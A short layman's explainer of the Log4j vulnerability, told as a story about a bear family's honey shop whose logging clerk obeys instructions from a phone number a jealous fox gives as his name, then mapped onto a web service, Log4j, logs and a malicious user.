Log4j vulnerability explained
You must have by now read about the log4j vulnerability that has taken the internet by storm. This post aims to explain what it is in absolute layman terms using an analogy.
Mama Bear owns a small honey business in the Evergreen forest called the “The Mama’s Honey“.
Every customer that comes to the shop tells their name, the type of honey they want and the quantity. She writes the information on a piece of paper as follows:
Customer Name: ….
Honey Type: …..
Amount: ….
She then passes this over to Papa Bear. He takes the paper, notes the information in the record book in the following format:
Today <Date>, <Customer Name> purchased <Amount> of <Honey Type>. Hope they will enjoy it!
He then grabs the Honey and gives it to Mama Bear, who gives it to the customer.
As the business grew, they added a capability for customers to provide a phone number as a value of any of the fields if they weren’t sure of the information. Once Mama Bear passed the information to Papa Bear, he would call the number and would act on the information given exactly as told.
Grumpy fox was always jealous of how well Mama Bear’s business was doing. He came to know of the new capability that was added and decided to exploit it to his advantage. He goes to her shop and provides his phone number for the customer name. Mama Bear writes the information down on the paper as follows and passes it to Papa Bear.
Customer Name: 999-888-7878
Honey Type: Orange
Amount: 2
As expected, when Papa Bear reads this information, he notices the phone number and calls the Grumpy Fox for information. Grumpy Fox smirks and asks Papa Bear to destroy the record book and the honey business. Not knowing anything better, Papa Bear goes ahead and does exactly that. Boom!
Now to understand the real problem, replace the characters in the story as follows:
Mama Bear -> Your Web Service
Papa Bear -> Log4j library
Record book -> Your logs
Grumpy Fox -> Malicious User
and read the detailed analysis of the vulnerability here.